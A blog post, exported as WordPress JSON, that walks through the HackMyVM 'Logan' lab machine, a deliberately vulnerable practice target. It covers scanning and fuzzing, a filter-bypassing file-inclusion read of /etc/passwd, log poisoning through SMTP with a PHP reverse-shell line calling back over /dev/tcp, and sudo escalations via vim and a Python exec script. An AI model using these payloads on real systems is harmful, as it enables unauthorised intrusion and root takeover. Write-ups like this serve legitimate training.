{"id":699,"date":"2024-06-28T20:03:40","date_gmt":"2024-06-28T12:03:40","guid":{"rendered":"http:\/\/162.14.82.114\/?p=699"},"modified":"2024-06-28T20:03:40","modified_gmt":"2024-06-28T12:03:40","slug":"hmv-_-logan","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/699\/06\/28\/2024\/","title":{"rendered":"hmv[-_-]Logan"},"content":{"rendered":"<h1>Logan<\/h1>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ rustscan -a 192.168.0.181 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.0.181:25\nOpen 192.168.0.181:80\nPORT   STATE SERVICE REASON  VERSION\n25\/tcp open  smtp    syn-ack Postfix smtpd\n| ssl-cert: Subject: commonName=logan\n| Subject Alternative Name: DNS:logan\n| Issuer: commonName=logan\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-07-03T13:46:49\n| Not valid after:  2033-06-30T13:46:49\n| MD5:   9b0d:3da4:7274:a99c:8b9e:705a:122f:249f\n| SHA-1: ef60:c55c:e4bf:e99a:c4bb:3281:f2c4:ded5:d44b:4801\n| -----BEGIN CERTIFICATE-----\n| MIIC7DCCAdSgAwIBAgIUAlr\/UnIZGJp5n3bGtfiPosfmoh4wDQYJKoZIhvcNAQEL\n| BQAwEDEOMAwGA1UEAwwFbG9nYW4wHhcNMjMwNzAzMTM0NjQ5WhcNMzMwNjMwMTM0\n| NjQ5WjAQMQ4wDAYDVQQDDAVsb2dhbjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC\n| AQoCggEBALA1lkF4fnRQLkvBGoCsRJlInBrwk8yxe8jWue068b2Q7Ti3rNtGhf6G\n| Ze7FX1Yjb5NH1KTTcqumNb\/nAxv9hMl4Dc50MC2hSWq6qMnqOrkb+AI16bVuhYcm\n| SLGsuq7bPGflyhfoIK8Cj0xXvZS65D68pBhoZ\/7Oji5rGMfngnrcJ2Q36Ctimm8b\n| UK+exEWSgbC12xd2f\/noFWBPrB7EC5XHMYARVV6\/I17aajheOqEKBTDL0AkSqzKT\n| \/snWlz7vjMGjJsNIZ6o6wZUYxqXzFDXnInyQ7k+IPXcDDp7V3TOZAB6jQwZhdH2o\n| 1+CGuwBbCWvV+kAGvlTotL7k9RN5F\/cCAwEAAaM+MDwwCQYDVR0TBAIwADAQBgNV\n| HREECTAHggVsb2dhbjAdBgNVHQ4EFgQUeVAVq\/\/+vvbEd+bXwnPsAxY6HxAwDQYJ\n| KoZIhvcNAQELBQADggEBADScL3LqV9\/XFprgMf6GOz8y2lvbkOSADTvFHUQiBcqp\n| \/K\/LWCXRtHJVkJA5z5+IMAFWGfueBffgdZLnKtyCLfUtsMqqqoVR0BXlzPys1Jhm\n| Ri4Ra9KVvH7pxt69kD+3xk7Hz8jyHQVfXWGmPZ\/li6OOQxKei69CwDqTvcvjyNyc\n| lcix3P+eTIDcnWHFu2wkOew8+q7Mza7IzfIy6u3qs5Lqccv1fMDhDYMQ2j5iGEo9\n| SZMyBUTRqR2nmX8wuL6wYHcmvfWp0Px3bAXxaqz2p96W3XTqPECTJ45rcfRsdbFB\n| SIh86N9X05gerFhkaKhczHfR1hjtyUb1LltfRhbh7cY=\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n|_smtp-commands: logan.hmv, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n80\/tcp open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\n| http-methods: \n|_  Supported 
Methods: GET POST OPTIONS HEAD\n|_http-title: Site doesn&#039;t have a title (text\/html).\nService Info: Host:  logan.hmv<\/code><\/pre>\n<p>The scan reveals a hostname, so add a hosts entry for it:<\/p>\n<pre><code class=\"language-text\">192.168.0.181   logan.hmv<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ gobuster dir -u http:\/\/logan.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/logan.hmv\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,bak,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 274]\n\/index.html           (Status: 200) [Size: 19038]\n\/images               (Status: 301) [Size: 307] [--&gt; http:\/\/logan.hmv\/images\/]\n\/.html                (Status: 403) [Size: 274]\n\/css                  (Status: 301) [Size: 304] [--&gt; http:\/\/logan.hmv\/css\/]\n\/js                   (Status: 301) [Size: 303] [--&gt; http:\/\/logan.hmv\/js\/]\n\/javascript           (Status: 301) [Size: 311] [--&gt; http:\/\/logan.hmv\/javascript\/]\nProgress: 253809 \/ 1323366 (19.18%)[ERROR] Get &quot;http:\/\/logan.hmv\/mpu.zip&quot;: context deadline exceeded (Client.Timeout exceeded 
while awaiting headers)\n[ERROR] Get &quot;http:\/\/logan.hmv\/28920.zip&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)<\/code><\/pre>\n<p>Nothing useful turned up.<\/p>\n<h2>Vulnerability Discovery<\/h2>\n<p>Take a look at roughly what the site contains:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s http:\/\/logan.hmv | html2text | uniq \n\n _Logan_S.A._\n    * Home_(current)\n\n****** Logan\nSecurity\n Service  ******\nWe are dedicated to protecting companies like you\n****** Logan\nSecurity\n Service  ******\nWe are dedicated to protecting companies like you\n****** Logan\nSecurity\n Service  ******\nWe are dedicated to protecting companies like you\nRead More\n===============================================================================\nPrevious Next\n\n**** ABOUT OUR COMPANY ****\nWe can protect your business both physically and technologically\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor\nincididunt ut labore et dolore magna aliqua. 
Ut enim ad minim veniam, quis\nnostrud exercitation ullamco\nRead More\n===============================================================================\n\n**** OUR SERVICES ****\nad minim veniam, quis nostrud exercitation ullamco\n* Tab Services *\nadipiscing elit, sed do eiusmod tempor incididunt\nRead More\n===============================================================================\n* Pipe Water *\nadipiscing elit, sed do eiusmod tempor incididunt\nRead More\n===============================================================================\n* Washing Machine *\nadipiscing elit, sed do eiusmod tempor incididunt\nRead More\n===============================================================================\n* Hand Washing *\nadipiscing elit, sed do eiusmod tempor incididunt\nRead More\n===============================================================================\n\n**** HOW IT WORKS ****\n* Adipiscing elit *\nRead More\n===============================================================================\n\n**** Booking Online ****\n[                    ]\n[Unknown INPUT type]\n[                    ]\n[One of: TYPE OF SERVICE\/Service 1\/Service 2\/Service 3]\n[                    ]\n SEND\n\n**** What clients says ****\nIt is a very bad company, THEY STEALED OUR DATABASE.\nWe will hack you\n* LiveTech *\n\n***** Logan *****\nIt is a long established fact that a reader will be distracted by the readable\ncontent of a page when looking at its layout. 
The point of\n*** Navigation ***\n    * Home\n    * About\n    * Services\n    * Contact_Us\n    * Login\n*** Contact Info ***\n* Corporate Office Address: *\n  Loram ipusm New York, NY 36524\n* Customer Service: *\n  ( +01 1234567890 )\n*** Discover ***\n    * Help\n    * How It Works\n    * subscribe\n    * Contact_Us\n\nCopyright \u00a9 2019 All Rights Reserved By Free_Html_Templates<\/code><\/pre>\n<p>Take a look at the related configuration:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ whatweb http:\/\/logan.hmv\nhttp:\/\/logan.hmv [200 OK] Apache[2.4.52], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.52 (Ubuntu)], IP[192.168.0.181], JQuery[3.4.1], Script[text\/javascript], Title[Logan], X-UA-Compatible[IE=edge]<\/code><\/pre>\n<p>Because this is a fairly old machine, component vulnerabilities are not the first thing to try.<\/p>\n<h3>Fuzzing Domain Names<\/h3>\n<p>The given domain name is fairly short, so fuzz it to see whether anything else turns up:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ ffuf -u http:\/\/192.168.0.181\/ -H &#039;HOST: FUZZ.logan.hmv&#039; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 5\n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       
v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.0.181\/\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header           : Host: FUZZ.logan.hmv\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response words: 5\n________________________________________________\n\nadmin                   [Status: 200, Size: 1112, Words: 300, Lines: 63, Duration: 649ms]<\/code><\/pre>\n<p>Add a hosts entry for the new name:<\/p>\n<pre><code class=\"language-text\">192.168.0.181   admin.logan.hmv<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ gobuster dir -u http:\/\/admin.logan.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/admin.logan.hmv\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              html,php,zip,bak,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 280]\n\/.html                (Status: 403) [Size: 280]\n\/index.html           (Status: 200) [Size: 
1112]\n\/upload.php           (Status: 200) [Size: 306]\n\/javascript           (Status: 301) [Size: 323] [--&gt; http:\/\/admin.logan.hmv\/javascript\/]<\/code><\/pre>\n<p>There is a file upload location; looking into it turned up three URLs:<\/p>\n<pre><code class=\"language-text\">http:\/\/admin.logan.hmv\/upload.php\nhttp:\/\/admin.logan.hmv\/clearlogs.php\nhttp:\/\/admin.logan.hmv\/payments.php<\/code><\/pre>\n<p>I tried uploading a file, but nothing came of it; the shell never connected back.<\/p>\n<h3>LFI Exploitation<\/h3>\n<p>Check whether the other pages have an exploitable vulnerability:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -i  http:\/\/admin.logan.hmv\/upload.php\nHTTP\/1.1 200 OK\nDate: Fri, 28 Jun 2024 10:28:48 GMT\nServer: Apache\/2.4.52 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 306\nContent-Type: text\/html; charset=UTF-8\n\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n  &lt;meta charset=&quot;UTF-8&quot;&gt;\n  &lt;title&gt;Subir Archivos&lt;\/title&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n  &lt;h1&gt;Upload files&lt;\/h1&gt;\n  &lt;form action=&quot;upload.php&quot; method=&quot;POST&quot; enctype=&quot;multipart\/form-data&quot;&gt;\n    &lt;input type=&quot;file&quot; name=&quot;archivo&quot;&gt;\n    &lt;input type=&quot;submit&quot; value=&quot;upload&quot;&gt;\n  &lt;\/form&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -i  http:\/\/admin.logan.hmv\/payments.php            \nHTTP\/1.1 200 OK\nDate: Fri, 28 Jun 2024 10:33:34 GMT\nServer: Apache\/2.4.52 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 294\nContent-Type: text\/html; charset=UTF-8\n\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n  &lt;meta charset=&quot;UTF-8&quot;&gt;\n  &lt;title&gt;Payments&lt;\/title&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n  &lt;form method=&quot;POST&quot;&gt;\n    &lt;label for=&quot;payments.php&quot;&gt;Payment code (01,02,..):&lt;\/label&gt;\n    &lt;input type=&quot;text&quot; id=&quot;file&quot; name=&quot;file&quot;&gt;\n    &lt;input type=&quot;submit&quot; 
value=&quot;Show&quot;&gt;\n  &lt;\/form&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>Then try passing parameters: the upload page offers nothing to exploit, while the query page below does:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d &#039;file=01&#039; http:\/\/admin.logan.hmv\/payments.php | html2text\nCompany: Tinder\nDate: 02\/05\/2023\nAmount: 1000$\nPayment code (01,02,..): [file                ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d &#039;file=02&#039; http:\/\/admin.logan.hmv\/payments.php | html2text\nCompany: LiveTech\nDate: 03\/05\/2023\nAmount: 60000$\nPayment code (01,02,..): [file                ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d &#039;file=03&#039; http:\/\/admin.logan.hmv\/payments.php | html2text\nCompany: HackMyVm\nDate: 20\/05\/2023\nAmount: 500$\nPayment code (01,02,..): [file                ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d &#039;file=1&#039; http:\/\/admin.logan.hmv\/payments.php | html2text\nFile does not exist\nPayment code (01,02,..): [file                ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d &#039;file=..\/..\/..\/..\/..\/..\/..\/etc\/passwd&#039; http:\/\/admin.logan.hmv\/payments.php | html2text\nFile does not exist\nPayment code (01,02,..): [file                ] [Show]<\/code><\/pre>\n<p>There may be a file inclusion vulnerability, so try to exploit it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 
&#039;file=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd&#039; http:\/\/admin.logan.hmv\/payments.php | html2text\nFile does not exist\nPayment code (01,02,..): [file                ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d &#039;file=....\/\/....\/\/....\/\/....\/\/....\/\/etc\/passwd&#039; http:\/\/admin.logan.hmv\/payments.php | html2text \nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/\nnologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/\nnologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:104::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:105:systemd Time 
Synchronization,,,:\/run\/systemd:\/usr\/\nsbin\/nologin\npollinate:x:105:1::\/var\/cache\/pollinate:\/bin\/false\nsyslog:x:107:113::\/home\/syslog:\/usr\/sbin\/nologin\nuuidd:x:108:114::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:109:115::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:110:116:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nlandscape:x:111:117::\/var\/lib\/landscape:\/usr\/sbin\/nologin\nfwupd-refresh:x:112:118:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nusbmux:x:113:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nlogan:x:1000:1000:logan:\/home\/logan:\/bin\/bash\nlxd:x:999:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\npostfix:x:115:121::\/var\/spool\/postfix:\/usr\/sbin\/nologin\ndnsmasq:x:106:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\nsshd:x:114:65534::\/run\/sshd:\/usr\/sbin\/nologin\nPayment code (01,02,..): [file                ] [Show]<\/code><\/pre>\n<p>But this alone cannot be exploited further, which brings to mind the sensitive port from earlier that has not been used yet.<\/p>\n<h3>Exploiting the Sensitive Port<\/h3>\n<p>Port 25 is open, so try connecting to it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ telnet 192.168.0.181 25   \nTrying 192.168.0.181...\nConnected to 192.168.0.181.\nEscape character is &#039;^]&#039;.\n220 logan.hmv ESMTP Postfix (Ubuntu)\n421 4.4.2 logan.hmv Error: timeout exceeded\nConnection closed by foreign host.<\/code><\/pre>\n<p>This means the mail port is usable, so check whether the related log can be read:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 
&#039;file=....\/\/....\/\/....\/\/....\/\/....\/\/var\/log\/mail.log&#039; http:\/\/admin.logan.hmv\/payments.php | html2text\nJun 28 09:55:34 logan postfix\/postfix-script[1659]: starting the Postfix mail\nsystem\nJun 28 09:55:34 logan postfix\/master[1661]: daemon started -- version 3.6.4,\nconfiguration \/etc\/postfix\nJun 28 09:58:52 logan postfix\/smtpd[1681]: warning: hostname kali does not\nresolve to address 192.168.0.143: Temporary failure in name resolution\nJun 28 09:58:52 logan postfix\/smtpd[1681]: connect from unknown[192.168.0.143]\nJun 28 09:58:52 logan postfix\/smtpd[1681]: lost connection after CONNECT from\nunknown[192.168.0.143]\nJun 28 09:58:52 logan postfix\/smtpd[1681]: disconnect from unknown\n[192.168.0.143] commands=0\/0\nJun 28 09:59:22 logan postfix\/smtpd[1681]: connect from unknown[unknown]\nJun 28 09:59:22 logan postfix\/smtpd[1681]: lost connection after CONNECT from\nunknown[unknown]\nJun 28 09:59:22 logan postfix\/smtpd[1681]: disconnect from unknown[unknown]\ncommands=0\/0\nJun 28 09:59:22 logan postfix\/smtpd[1681]: warning: hostname kali does not\nresolve to address 192.168.0.143: Temporary failure in name resolution\n...........<\/code><\/pre>\n<p>Try an injection:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ telnet 192.168.0.181 25\nTrying 192.168.0.181...\nConnected to 192.168.0.181.\nEscape character is &#039;^]&#039;.\n220 logan.hmv ESMTP Postfix (Ubuntu)\nMAIL FROM: hack\n250 2.1.0 Ok\nRCPT TO: &lt;?php exec(&#039;bash -c &quot;exec bash -i &amp;&gt;\/dev\/tcp\/192.168.0.143\/1234 &lt;&amp;1&quot;&#039;);?&gt;       \n501 5.1.3 Bad recipient address syntax\n<\/code><\/pre>\n<p>Check whether it works:<\/p>\n<pre><code class=\"language-bash\">curl -s -i -X POST -d &#039;file=....\/\/....\/\/....\/\/....\/\/....\/\/var\/log\/mail.log&#039; 
http:\/\/admin.logan.hmv\/payments.php<\/code><\/pre>\n<p>The reverse shell connected back.<\/p>\n<pre><code class=\"language-warning\">If the shell does not connect back after many attempts, the log has probably been polluted; restart the target machine and try again.<\/code><\/pre>\n<h2>Privilege Escalation<\/h2>\n<h3>Escalating to a User via vim<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@logan:\/var\/www\/admin$ sudo -l\nMatching Defaults entries for www-data on logan:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser www-data may run the following commands on logan:\n    (logan) NOPASSWD: \/usr\/bin\/vim\n\n(remote) www-data@logan:\/var\/www\/admin$ sudo -u logan \/usr\/bin\/vim -c &#039;:!\/bin\/bash&#039;\n\nlogan@logan:\/var\/www\/admin$ whoami;id\nlogan\nuid=1000(logan) gid=1000(logan) groups=1000(logan),27(sudo),1002(administration)\nlogan@logan:\/var\/www\/admin$ cd ~\nlogan@logan:~$ ls -la\ntotal 36\ndrwxr-xrwx 4 logan logan 4096 Jul 18  2023 .\ndrwxr-xr-x 3 root  root  4096 Jul 17  2023 
..\nlrwxrwxrwx 1 root  root     9 Jul 17  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-x 1 logan logan  220 Jan  6  2022 .bash_logout\n-rw-r--r-x 1 logan logan 3771 Jan  6  2022 .bashrc\ndrwx---r-x 2 logan logan 4096 Jul  3  2023 .cache\ndrwxrwxr-x 3 logan logan 4096 Jul 17  2023 .local\n-rw-r--r-x 1 logan logan  807 Jan  6  2022 .profile\n-rw-r--r-x 1 logan logan    0 Jul  3  2023 .sudo_as_admin_successful\n-rw-r--r-- 1  1002  1003   68 Jul 17  2023 to-do\n-rw-r--r-- 1 logan logan   16 Jul 17  2023 user.txt\nlogan@logan:~$ cat user.txt \nUser: ilovelogs\nlogan@logan:~$ cat to-do \n- Go outside\n- Try the new script that gave me root to learn python\nlogan@logan:~$ sudo -l\nMatching Defaults entries for logan on logan:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser logan may run the following commands on logan:\n    (root) NOPASSWD: \/usr\/bin\/python3 \/opt\/learn_some_python.py\nlogan@logan:~$ ls -la \/opt\/learn_some_python.py\n-rw------- 1 root root 132 Jul 18  2023 \/opt\/learn_some_python.py\nlogan@logan:~$ sudo \/usr\/bin\/python3 \/opt\/learn_some_python.py\nWelcome!!!\n\n The first you need to now is how to use print, please type print(&#039;hello&#039;)\n\naaaaaaaaa\nTraceback (most recent call last):\n  File &quot;\/opt\/learn_some_python.py&quot;, line 3, in &lt;module&gt;\n    exec(comand)\n  File &quot;&lt;string&gt;&quot;, line 1, in &lt;module&gt;\nNameError: name &#039;aaaaaaaaa&#039; is not defined\nlogan@logan:~$ sudo \/usr\/bin\/python3 \/opt\/learn_some_python.py\nWelcome!!!\n\n The first you need to now is how to use print, please type print(&#039;hello&#039;)\n\nprint(&#039;hello&#039;)                      \nhello<\/code><\/pre>\n<h3>Escalating to root by Executing Python Code<\/h3>\n<p>The script executes whatever Python code is typed in, so try running code that escalates privileges:<\/p>\n<pre><code 
class=\"language-bash\">logan@logan:~$ sudo \/usr\/bin\/python3 \/opt\/learn_some_python.py\nWelcome!!!\n\n The first you need to now is how to use print, please type print(&#039;hello&#039;)\n\nimport os; os.system(&quot;\/bin\/bash&quot;)\nroot@logan:\/home\/logan# cd ~\nroot@logan:~# ls -la\ntotal 48\ndrwx------  5 root root 4096 Jul 17  2023 .\ndrwxr-xr-x 19 root root 4096 Jul  3  2023 ..\nlrwxrwxrwx  1 root root    9 Jul 17  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3106 Oct 15  2021 .bashrc\ndrwx------  3 root root 4096 Jul  3  2023 .launchpadlib\n-rw-------  1 root root   20 Jul 17  2023 .lesshst\ndrwxr-xr-x  3 root root 4096 Jul  3  2023 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-r--r--  1 root root   66 Jul  4  2023 .selected_editor\n-rw-r--r--  1 root root    0 Jul  3  2023 .sudo_as_admin_successful\n-rw-------  1 root root  985 Jul 17  2023 .viminfo\n-rw-r--r--  1 root root  169 Jul  3  2023 .wget-hsts\n-rw-r--r--  1 root root   17 Jul 17  2023 root.txt\ndrwx------  3 root root 4096 Jul  4  2023 snap\nroot@logan:~# cat root.txt \nRoot: siuuuuuuuu<\/code><\/pre>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/tao0845.github.io\/2024\/04\/24\/HackMyVM-Logan\/\">https:\/\/tao0845.github.io\/2024\/04\/24\/HackMyVM-Logan\/<\/a><\/p>\n<p><a href=\"https:\/\/blank-ms1.github.io\/posts\/Logan-HackMyVm\/\">https:\/\/blank-ms1.github.io\/posts\/Logan-HackMyVm\/<\/a><\/p>\n<p><a href=\"https:\/\/kaianperez.github.io\/logan\/\">https:\/\/kaianperez.github.io\/logan\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Logan Information Gathering Port Scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan] \u2514\u2500$ rusts 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-699","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/699","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=699"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/699\/revisions"}],"predecessor-version":[{"id":700,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/699\/revisions\/700"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=699"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=699"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\